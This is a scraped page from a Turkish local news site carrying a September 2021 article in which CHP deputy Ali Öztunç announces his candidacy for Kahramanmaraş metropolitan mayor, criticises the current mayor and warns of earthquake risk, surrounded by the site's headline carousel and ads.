KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/indirimli.com.tr_1.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/borc-yapilandirma-basvuru-ve-odeme-sureleri-uzatildi-h71103.html" title="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/09/belediye-borc-yapılandırma.jpg" alt="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı" />
      <div class="caption">Borç yapılandırma başvuru ve ödeme...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/kaski-su-fiyatlarina-zam-yapti-h71100.html" title="KASKİ, su fiyatlarına zam yaptı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/09/İsimsiz-1.jpg" alt="KASKİ, su fiyatlarına zam yaptı" />
      <div class="caption">KASKİ, su fiyatlarına zam yaptı</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-hayat-da-asi-da-ertelemeye-gelmez-h71089.html" title="Kaymakam Demir: “Hayat da aşı da ertelemeye gelmez”" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/09/kaymakam-aşı-cağrısı-2.jpg" alt="Kaymakam Demir: “Hayat da aşı da ertelemeye gelmez”" />
      <div class="caption">Kaymakam Demir: “Hayat da aşı...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/elbistana-3u-uzman-13-hekim-atanacak-h71085.html" title="Elbistan’a 3’ü uzman 13 hekim atanacak" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/09/doktor.jpg" alt="Elbistan’a 3’ü uzman 13 hekim atanacak" />
      <div class="caption">Elbistan’a 3’ü uzman 13 hekim...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/icisleri-bakanligi-ndan-pcr-testi-icin-yeni-genelge-h71075.html" title="İçişleri Bakanlığı&#039;ndan PCR testi için yeni genelge" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/09/koronaoldu.jpg" alt="İçişleri Bakanlığı&#039;ndan PCR testi için yeni genelge" />
      <div class="caption">İçişleri Bakanlığı'ndan PCR testi için...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/kentpark-okul.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Öztunç: “Büyükşehir Belediyesi’ne adayım”</h1>
                <h2 class="lead" itemprop="description"><strong>Cumhuriyet Halk Partisi (CHP) Genel Başkan Yardımcısı Kahramanmaraş Milletvekili Ali Öztunç, önümüzdeki dönem için Büyükşehir Belediye Başkanlığı’na aday olduğunu açıkladı.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-09-04 11:44:38" content="2021-09-04T11:44:38+02:00">04 Eylül 2021 Cumartesi 11:44</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" alt="Öztunç: “Büyükşehir Belediyesi’ne adayım”" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-71106"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Büyükşehir Belediye Başkanı Hayrettin Güngör’ü de istifaya davet eden Öztunç, Elbistan’a da hizmet yapılmadığını belirterek, “Hayrettin Güngör, Elbistan’ı unutmuş” dedi.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Kahramanmaraş Kalesi’nde düzenlediği basın toplantısında konuşan CHP Genel Başkan Yardımcısı Ali Öztunç, Büyükşehir Belediye Başkanı Hayrettin Güngör’ü, seçim vaatleri üzerinden eleştiri yağmuruna tuttu.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">‘Hayrettin bey gönül işini yanlış anlamış’ diyen Öztunç, “Kahramanmaraş’ın büyük bir sorunu var. Hayrettin Güngör sorunu var maalesef. Hayrettin bey belediye başkanı olduğunda, belediyeciliğin kitabını yazdığı söylendi. Hizmet edeceği söylendi. Şehri kalkındıracağı, şehre büyük yatırımlar yapacağı, şehri çok farklı noktalara getireceği söylendi. Ama anladık ki, Hayrettin bey sadece kitap yazmış başka bir şey yapmamış. Hayrettin Güngör, benimle yarıştığı yerel seçimlerde içerisinde vaatler olan bir kitapta ‘gönül işi’ diyor. Hayrettin bey gönül işini yanlış anlamış. </span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif"> Hayrettin Güngör, Elbistan’ı unutmuş. Hayrettin Güngör’ün gözünde Elbistan diye bir kent yok. Belediyeciliğin kitabını yazdım diye gelen vatandaş, maalesef Kahramanmaraş’a çok büyük kötülük yapıyor. Boş çıktın Hayrettin Güngör. Benim kendisine bir önerim var. Sayın Güngör, yolun neresinden dönersen kardır. Beceremiyorsun, yapamıyorsun, yönetemiyorsun. Koca şehri köy haline getirecek Hayrettin Güngör. Devlet memuru gibisin. Kahramanmaraş’a zerre kadar sevdası varsa, istifa eder. Vizyon yok. Kahramanmaraş’ın 5 yılı heba oldu. Şehrin 2,5 yılı gitti geriye kalan 2,5 yılını kurtarmış olalım. Önümüzdeki dönem zaten o koltuğa Ali Öztunç oturacak. Ben düzelteceğim zaten. Hayrettin Güngör, Türkiye’deki büyükşehir belediye başkanları arasında en beceriksizidir. Kitabını yazmış olabilir ama pratiği bilmiyor ” değerlendirmesinde bulundu. </span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Kahramanmaraş’ın büyük bir deprem riskiyle karşı karşıya olduğunu hatırlatan Öztunç, “Kahramanmaraş ciddi deprem bölgesi uyarıyorum, Bingöl’den başlayıp buradan geçip Hatay’a giden fay hattı yüzyıllardır kırılmamış. Her an kırılabilir. Kahramanmaraş çok büyük bir deprem yaşayabilir. Çok büyük bir sıkıntı olur bu durum. O yüzden biran evvel depremle ilgili tedbir almamız gerekiyor Burada acilen bir deprem çalıştayı yapılmak zorunda. Hayrettin Güngör yapamaz. Ama valiye sesleniyorum; eğer yapamıyorsanız bana söylesinler Kahramanmaraş’ta deprem çalıştayını ben yapacağım” ifadelerini kullandı.</span></span></p>

<p></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/borc-yapilandirma-basvuru-ve-odeme-sureleri-uzatildi-h71103.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kaski-su-fiyatlarina-zam-yapti-h71100.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/mikrokredi-ile-7-yilda-hayati-degisti-h71099.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kentparktan-okula-donus-kampanyasi-h71098.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-yksde-dereceye-giren-ogrencileri-misafir-etti-h71097.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/igdeliler-derneklerinin-yoneticileri-istisare-toplantisinda-bulustu-h71096.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/evcihuyukten-suriye-ye-yardim-eli-h71095.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/camura-batan-inek-itfaiye-tarafindan-kurtarildi-2-h71094.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ceyhana-18-bin-adet-yavru-sazan-baligi-birakildi-h71093.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baro-temsilciliginden-asure-birlikteligi-h71092.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ekinozunde-uyusturucu-operasyonu-6-kilo-esrar-ele-gecirildi-h71090.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-hayat-da-asi-da-ertelemeye-gelmez-h71089.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/roma-ve-islam-donemine-ait-15-adet-tarihi-eser-ele-gecirildi-h71088.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/okul-servis-ucretleri-belli-oldu-h71087.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kopruler-yenilendi-h71086.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elbistana-3u-uzman-13-hekim-atanacak-h71085.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/yasli-adami-92-bin-avro-dolandiran-supheliler-kiskivrak-yakalandi-h71084.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/dev-kaya-kamyonu-devrildi-h71083.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/belgesiz-avlanan-2-sahsa-idari-islem-uygulandi-h71082.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/icisleri-bakanligi-ndan-pcr-testi-icin-yeni-genelge-h71075.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/tasovaya-atanan-elbistanli-kaymakam-gorevine-basladi-h71074.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kurakligin-vurdugu-elbistan-ciftcisine-dekara-50-lira-destek-gozuktu-h71073.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/turkoren-hasan-erdogan-ortaokuluna-e-twinning-kalite-etiketi-odulu-h71072.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/erbilen-sigorta-hizmete-basladi-h71071.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="http://www.elbistaninsesi.com/guncel/oztunc-buyuksehir-belediyesine-adayim-h71106.html" title="Öztunç: “Büyükşehir Belediyesi’ne adayım”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/oztunc_buyuksehir_belediyesine_adayim_h71106_8141d.jpg" alt="Öztunç: “Büyükşehir Belediyesi’ne adayım”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öztunç: “Büyükşehir Belediyesi’ne adayım”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/borc-yapilandirma-basvuru-ve-odeme-sureleri-uzatildi-h71103.html" title="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/borc_yapilandirma_basvuru_ve_odeme_sureleri_uzatildi_h71103_7e922.jpg" alt="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Borç yapılandırma başvuru ve ödeme süreleri uzatıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kaski-su-fiyatlarina-zam-yapti-h71100.html" title="KASKİ, su fiyatlarına zam yaptı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/kaski_su_fiyatlarina_zam_yapti_h71100_548f0.jpg" alt="KASKİ, su fiyatlarına zam yaptı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">KASKİ, su fiyatlarına zam yaptı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/mikrokredi-ile-7-yilda-hayati-degisti-h71099.html" title="Mikrokredi ile 7 yılda hayatı değişti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/mikrokredi_ile_7_yilda_hayati_degisti_h71099_ceb9e.jpg" alt="Mikrokredi ile 7 yılda hayatı değişti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Mikrokredi ile 7 yılda hayatı değişti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kentparktan-okula-donus-kampanyasi-h71098.html" title="Kentpark’tan okula dönüş kampanyası">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/kentparktan_okula_donus_kampanyasi_h71098_d81da.jpg" alt="Kentpark’tan okula dönüş kampanyası" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kentpark’tan okula dönüş kampanyası</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-yksde-dereceye-giren-ogrencileri-misafir-etti-h71097.html" title="Kaymakam Demir, YKS’de dereceye giren öğrencileri misafir etti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/kaymakam_demir_yksde_dereceye_giren_ogrencileri_misafir_etti_h71097_a1161.jpg" alt="Kaymakam Demir, YKS’de dereceye giren öğrencileri misafir etti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaymakam Demir, YKS’de dereceye giren öğrencileri misafir etti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/igdeliler-derneklerinin-yoneticileri-istisare-toplantisinda-bulustu-h71096.html" title="İğdeliler Derneklerinin yöneticileri istişare toplantısında buluştu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/igdeliler_derneklerinin_yoneticileri_istisare_toplantisinda_bulustu_h71096_8cc78.JPG" alt="İğdeliler Derneklerinin yöneticileri istişare toplantısında buluştu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">İğdeliler Derneklerinin yöneticileri istişare toplantısında buluştu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/evcihuyukten-suriye-ye-yardim-eli-h71095.html" title="Evcihüyük’ten Suriye&#039;ye yardım eli">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/evcihuyukten_suriye_ye_yardim_eli_h71095_f56d5.jpg" alt="Evcihüyük’ten Suriye&#039;ye yardım eli" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Evcihüyük’ten Suriye&#039;ye yardım eli</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/camura-batan-inek-itfaiye-tarafindan-kurtarildi-2-h71094.html" title="Çamura batan inek, itfaiye tarafından kurtarıldı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/camura_batan_inek_itfaiye_tarafindan_kurtarildi_h71094_9826a.jpg" alt="Çamura batan inek, itfaiye tarafından kurtarıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Çamura batan inek, itfaiye tarafından kurtarıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ceyhana-18-bin-adet-yavru-sazan-baligi-birakildi-h71093.html" title="Ceyhan’a 18 bin adet yavru sazan balığı bırakıldı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/ceyhana_18_bin_adet_yavru_sazan_baligi_birakildi_h71093_5049f.jpg" alt="Ceyhan’a 18 bin adet yavru sazan balığı bırakıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ceyhan’a 18 bin adet yavru sazan balığı bırakıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baro-temsilciliginden-asure-birlikteligi-h71092.html" title="Baro Temsilciliği’nden aşure birlikteliği">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/baro_temsilciliginden_asure_birlikteligi_h71092_a16f7.jpg" alt="Baro Temsilciliği’nden aşure birlikteliği" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Baro Temsilciliği’nden aşure birlikteliği</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ekinozunde-uyusturucu-operasyonu-6-kilo-esrar-ele-gecirildi-h71090.html" title="Ekinözü’nde uyuşturucu operasyonu: 6 kilo esrar ele geçirildi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/ekinozunde_uyusturucu_operasyonu_6_kilo_esrar_ele_gecirildi_h71090_4eb14.jpg" alt="Ekinözü’nde uyuşturucu operasyonu: 6 kilo esrar ele geçirildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ekinözü’nde uyuşturucu operasyonu: 6 kilo esrar ele geçirildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-hayat-da-asi-da-ertelemeye-gelmez-h71089.html" title="Kaymakam Demir: “Hayat da aşı da ertelemeye gelmez”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/kaymakam_demir_hayat_da_asi_da_ertelemeye_gelmez_h71089_6c2ee.jpg" alt="Kaymakam Demir: “Hayat da aşı da ertelemeye gelmez”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaymakam Demir: “Hayat da aşı da ertelemeye gelmez”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/roma-ve-islam-donemine-ait-15-adet-tarihi-eser-ele-gecirildi-h71088.html" title="Roma ve İslam dönemine ait 15 adet tarihi eser ele geçirildi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/roma_ve_islam_donemine_ait_15_adet_tarihi_eser_ele_gecirildi_h71088_14109.jpg" alt="Roma ve İslam dönemine ait 15 adet tarihi eser ele geçirildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Roma ve İslam dönemine ait 15 adet tarihi eser ele geçirildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/okul-servis-ucretleri-belli-oldu-h71087.html" title="Okul servis ücretleri belli oldu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/okul_servis_ucretleri_belli_oldu_h71087_94e8a.jpg" alt="Okul servis ücretleri belli oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Okul servis ücretleri belli oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kopruler-yenilendi-h71086.html" title="Köprüler yenilendi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/kopruler_yenilendi_h71086_da172.jpg" alt="Köprüler yenilendi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Köprüler yenilendi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elbistana-3u-uzman-13-hekim-atanacak-h71085.html" title="Elbistan’a 3’ü uzman 13 hekim atanacak">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/elbistana_3u_uzman_13_hekim_atanacak_h71085_a2def.jpg" alt="Elbistan’a 3’ü uzman 13 hekim atanacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan’a 3’ü uzman 13 hekim atanacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/yasli-adami-92-bin-avro-dolandiran-supheliler-kiskivrak-yakalandi-h71084.html" title="Yaşlı adamı 92 bin avro dolandıran şüpheliler kıskıvrak yakalandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/yasli_adami_92_bin_avro_dolandiran_supheliler_kiskivrak_yakalandi_h71084_1a9cc.jpg" alt="Yaşlı adamı 92 bin avro dolandıran şüpheliler kıskıvrak yakalandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yaşlı adamı 92 bin avro dolandıran şüpheliler kıskıvrak yakalandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/dev-kaya-kamyonu-devrildi-h71083.html" title="Dev kaya kamyonu devrildi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/dev_kaya_kamyonu_devrildi_h71083_2f8fe.jpg" alt="Dev kaya kamyonu devrildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Dev kaya kamyonu devrildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/belgesiz-avlanan-2-sahsa-idari-islem-uygulandi-h71082.html" title="Belgesiz avlanan 2 şahsa idari işlem uygulandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/belgesiz_avlanan_2_sahsa_idari_islem_uygulandi_h71082_72a88.jpg" alt="Belgesiz avlanan 2 şahsa idari işlem uygulandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Belgesiz avlanan 2 şahsa idari işlem uygulandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/icisleri-bakanligi-ndan-pcr-testi-icin-yeni-genelge-h71075.html" title="İçişleri Bakanlığı&#039;ndan PCR testi için yeni genelge">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/icisleri_bakanligi_ndan_pcr_testi_icin_yeni_genelge_h71075_54200.jpg" alt="İçişleri Bakanlığı&#039;ndan PCR testi için yeni genelge" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">İçişleri Bakanlığı&#039;ndan PCR testi için yeni genelge</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/tasovaya-atanan-elbistanli-kaymakam-gorevine-basladi-h71074.html" title="Taşova’ya atanan Elbistanlı kaymakam görevine başladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/tasovaya_atanan_elbistanli_kaymakam_gorevine_basladi_h71074_fead3.jpg" alt="Taşova’ya atanan Elbistanlı kaymakam görevine başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Taşova’ya atanan Elbistanlı kaymakam görevine başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kurakligin-vurdugu-elbistan-ciftcisine-dekara-50-lira-destek-gozuktu-h71073.html" title="Kuraklığın vurduğu Elbistan çiftçisine dekara 50 lira destek gözüktü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/kurakligin_vurdugu_elbistan_ciftcisine_dekara_50_lira_destek_gozuktu_h71073_f2e68.jpg" alt="Kuraklığın vurduğu Elbistan çiftçisine dekara 50 lira destek gözüktü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kuraklığın vurduğu Elbistan çiftçisine dekara 50 lira destek gözüktü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/turkoren-hasan-erdogan-ortaokuluna-e-twinning-kalite-etiketi-odulu-h71072.html" title="Türkören Hasan Erdoğan Ortaokulu’na e-Twinning kalite etiketi ödülü">

        
